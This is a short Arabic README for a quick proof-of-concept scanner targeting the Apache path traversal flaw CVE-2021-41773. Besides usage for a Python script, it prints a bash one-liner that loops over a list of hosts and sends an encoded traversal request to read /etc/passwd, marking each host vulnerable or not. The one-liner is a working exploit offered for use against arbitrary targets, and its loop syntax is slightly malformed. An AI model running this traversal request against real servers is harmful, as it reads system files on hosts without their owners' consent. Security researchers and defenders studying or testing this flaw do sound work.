
ماسح ضوئي لإثبات المفهوم لـ CVE-2021-41773 (اجتياز المسار في Apache). يتحقق من المضيفين بحثًا عن الثغرات عن طريق إرسال طلبات HTTP مصممة خصيصًا وتحليل الردود بحثًا عن مؤشرات الاختراق.
إثبات مفهوم سريع وغير دقيق لاختبار ما إذا كانت المضيفات عرضة لـ CVE-2021-41773
python3 full.py hosts.txt
حيث يحتوي hosts.txt على أهدافك:
domain.com
blah.com
192.168.1.1
سيطبع إذا كان المضيف معرضًا أم لا.
نسخة بايثون من bash:
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
استمتع!